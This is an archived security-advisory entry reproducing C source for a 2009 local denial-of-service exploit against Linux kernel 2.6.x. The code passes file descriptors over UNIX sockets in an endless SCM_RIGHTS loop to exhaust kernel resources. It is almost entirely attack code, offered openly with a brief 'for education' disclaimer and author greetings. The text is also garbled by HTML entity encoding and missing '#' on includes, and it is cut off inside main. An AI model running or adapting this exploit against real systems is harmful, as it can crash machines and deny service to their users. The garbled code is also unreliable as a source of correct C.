Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

2009-01-04T00:00:00
ID SECURITYVULNS:DOC:21101
Type securityvulns
Reporter Securityvulns
Modified 2009-01-04T00:00:00

Description

/* Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

Author : Adurit Team >> djekmani4ever

Home : www.hightsec.com

greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends

note : this code for education :) */

include <sys/socket.h>

include <sys/un.h>

include <unistd.h>

include <assert.h>

include <err.h>

include <stdlib.h>

static int own_child(int us) { int pid; int s[2]; struct msghdr mh; char crap[1024]; struct iovec iov; struct cmsghdr c; int *fd; int rc;

    pid = fork&#40;&#41;;
    if &#40;pid == -1&#41;
            err&#40;1, &quot;fork&#40;&#41;&quot;&#41;;

    if &#40;pid&#41; {
          close&#40;us[1]&#41;;

            return pid;
    }

    close&#40;us[0]&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    iov.iov_base = &quot;a&quot;;
    iov.iov_len  = 1;

    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;

    c-&gt;cmsg_level = SOL_SOCKET;
    c-&gt;cmsg_type  = SCM_RIGHTS;

    fd = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fd&#41;;

    c-&gt;cmsg_len = CMSG_LEN&#40;sizeof&#40;int&#41;&#41;;
    mh.msg_controllen = c-&gt;cmsg_len;

    while &#40;1&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, s&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;

            *fd = s[0];

            rc = sendmsg&#40;us[1], &amp;mh, 0&#41;;
            if &#40;rc == -1&#41;
                    err&#40;1, &quot;sendmsg&#40;&#41;&quot;&#41;;

            if &#40;rc != iov.iov_len&#41;
                    errx&#40;1, &quot;sent short&quot;&#41;;

            close&#40;s[0]&#41;;
            close&#40;us[1]&#41;;
            us[1] = s[1];
    }

}

static void own(void) {
static int pid; static int us[2]; char crap[1024]; char morte[1024]; struct cmsghdr c; int rc; struct msghdr mh; struct iovec iov; int fds;

    if &#40;!pid&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, us&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;
            pid = own_child&#40;us&#41;;
    }

    iov.iov_base = morte;
    iov.iov_len  = sizeof&#40;morte&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    rc = recvmsg&#40;us[0], &amp;mh, 0&#41;;
    if &#40;rc == -1&#41;
            err&#40;1, &quot;recvmsg&#40;&#41;&quot;&#41;;

    if &#40;rc == 0&#41;
            errx&#40;1, &quot;EOF&quot;&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;
    assert&#40;c-&gt;cmsg_type == SCM_RIGHTS&#41;;

    fds = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fds&#41;;

    close&#40;us[0]&#41;;
    us[0] = *fds;

}

int main(int argc, char *argv[]) { own(); exit(0);